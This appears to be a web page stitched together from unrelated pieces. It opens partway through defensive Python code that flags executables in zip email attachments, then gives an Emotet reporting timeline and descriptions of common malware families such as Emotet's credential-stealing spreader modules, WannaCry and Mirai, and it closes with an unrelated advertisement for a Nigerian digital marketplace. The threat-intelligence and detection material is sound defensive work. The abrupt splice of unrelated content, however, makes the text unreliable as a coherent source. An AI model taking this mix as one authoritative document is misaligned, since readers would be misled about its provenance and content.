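    """Convenience verdict for a gateway rule: any finding means hold the message for review."""
    return len(inspect_zip_attachment(zip_bytes)) > 0


if __name__ == "__main__":
    for name, reasons in inspect_zip_attachment(build_sample_zip()):
        print("[!] %s" % name)
        for r in reasons:
            print("      - " + r)
```

The MZ check is the one that survives renaming; the name-based checks are cheap and catch the social-engineering part of the lure, which is why both belong in the same rule.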

Reporting

  • January 2015: Emotet spam campaign targets banking credentials. (Microsoft TechNet)
  • April 2015: Emotet expands target list, evades two-factor authentication. (SCMagazine)
  • April 2017: Email campaign is delivering a new variant of the Emotet banking trojan, targeting mainly .UK top level domains from multiple sectors including major businesses and government departments. (Forcepoint)
  • July 2017: Emotet added a self-spreading capability. It drops a self-extracting RAR file on infected hosts and uses it to search for and gain access to local network resources after brute-forcing their login credentials. (Fidelis)
  • September 2017: Trend Micro researchers observed a new Emotet campaign, propagating via a spam botnet. The majority of targets are located in the United States with 58 percent of detected infections, followed by Great Britain at 12 percent. (Trend Micro)
  • November 2017: A new version of Emotet has been observed with a few changes in its usual behavior and new routines that allow it to elude sandbox and malware analysis. (Trend Micro)
  • July 2018: New malspam campaign pushing Emotet and Trickbot. (Palo Alto Networks)
  • July 2018: Evidence indicates that Mealybug, the threat group behind Emotet, has evolved from maintaining its custom banking trojan to operating as a distributor of threats for other groups. (Symantec)

Technical Details

  • Securelist provides technical analysis on the Emotet trojan, available here.
  • US-CERT released joint Technical Alert TA18-201A on Emotet here.

Top Malware Organizations Should Watch Out For

  • Kovter is a Trojan which has been observed acting as click-fraud malware or a ransomware downloader. It is disseminated via malspam email attachments containing malicious Office macros. Kovter is fileless malware that evades detection by hiding in registry keys. Some reports indicate that Kovter infections have received updated instructions from command and control infrastructure to serve as a remote access backdoor.
  • Emotet is a modular Trojan that downloads or drops banking Trojans. Initial infection occurs via malspam emails that contain malicious download links, a PDF with embedded links, or a macro-enabled Word attachment. Emotet incorporates spreader modules in order to propagate throughout a network. Emotet is known to download/drop the Pinkslipbot and Dridex banking Trojans. Currently, there are four known spreader modules:
      • Outlook Scraper: a tool that scrapes names and email addresses from the victim’s Outlook accounts and uses that information to send out phishing emails from the compromised account;
      • WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module;
      • Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module;
      • Credential Enumerator: a self-extracting RAR file containing a bypass and a service component. The bypass component is used for enumeration of network resources and either finds writable share drives or tries to brute-force user accounts, including the administrator account. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk.
  • WannaCry is a ransomware worm that uses the EternalBlue exploit to spread. Version 1.0 is known to have a “killswitch” domain, which stops the encryption process. Later versions are not known to have a “killswitch” domain. WannaCry is disseminated via malspam.
  • ZeuS/Zbot is a modular banking Trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS/Zbot source code in 2011, many other malware variants have adopted parts of its codebase, which means that events classified as ZeuS/Zbot may actually be other malware using parts of the ZeuS/Zbot code.
  • CoinMiner is a cryptocurrency miner that was initially disseminated via malvertising. Once a machine is infected, CoinMiner uses Windows Management Instrumentation (WMI) and EternalBlue to exploit SMB and spread across a network. CoinMiner uses the WMI Standard Event Consumer scripting to execute scripts for persistence.
  • Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device, allowing an attacker to fully control the infected device.
  • NanoCore is a Remote Access Trojan (RAT) spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.
  • Ursnif, and its variant Dreambot, are banking trojans known for weaponizing documents. Ursnif recently upgraded its web injection attacks to include TLS callbacks in order to obfuscate against anti-malware software. Ursnif collects victim information from login pages and web forms.
  • Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale distributed denial of service (DDoS) attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.
  • Redyms is a click-fraud trojan that is primarily downloaded via exploit kit. Redyms has virtualization and sandbox detection and is primarily distributed in the United States.

Nigeria’s best Digital Marketplace

Nigeria has a lot of online shops and marketplaces, but there seems to be little interest in digital marketplaces.

A place where you can sell your paintings, software, books, tutorials, videos, music, domain names, scripts, etc.

Just about anything that can be downloaded can be listed by you for sale.

The great thing is that you get to own your own store, list as many products under it as you want, and advertise it.

Here at John.ng we have everything set up for you.

We call it the Digital Marketplace!!!

https://shop.john.ng

While browsing the default homepage you can find it under the menu item “Marketplace”.

The platform has been built to be very robust and dynamic. Both buyers and sellers are assured an amazing time.